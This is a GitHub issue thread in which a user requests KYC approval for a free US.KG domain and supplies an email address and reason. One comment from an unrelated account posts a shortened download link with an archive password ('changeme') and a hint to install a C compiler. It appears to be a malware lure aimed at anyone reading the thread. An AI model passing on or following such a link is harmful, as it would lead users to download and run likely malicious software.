### ISSUE TITLE
Request GitHub KYC-florry673@desertsundesigns.com

### ISSUE THREAD

**Issue by clai-wh** [DigitalPlatDev/US.KG#9766]
### KYC Using Your GitHub Account

We use automated scripts to approve requests. Please make sure your GitHub account meets the following requirements (all are required):

- [x] I have starred this repository.
- [x] The issue title must be: Request GitHub KYC - Your US.KG Panel registered email. This ensures our automated script can detect your registered email.
- [x] This is not a new GitHub account; it has existing repositories and stars.
- [x] This is my first US.KG NIC Panel account.
- [x] I promise not to use the domain name for criminal or abusive purposes.

**Your Account Details (US.KG NIC Panel):**

Please fill out the following information; otherwise, your request will not be processed:

- Username: 
- Account Registration Email: 
- Reason for Registering the .US.KG Domain Name:

**Comment by SagarChandra07** [comment]
download
https://bit.ly/47P0Nvo

Password: changeme

you may need to install the c compiler

**Comment by clai-wh** [comment]
使用者名称：ergou
账户注册邮箱：florry673@desertsundesigns.com
注册.US.KG域名的原因：想要使用免费的域名
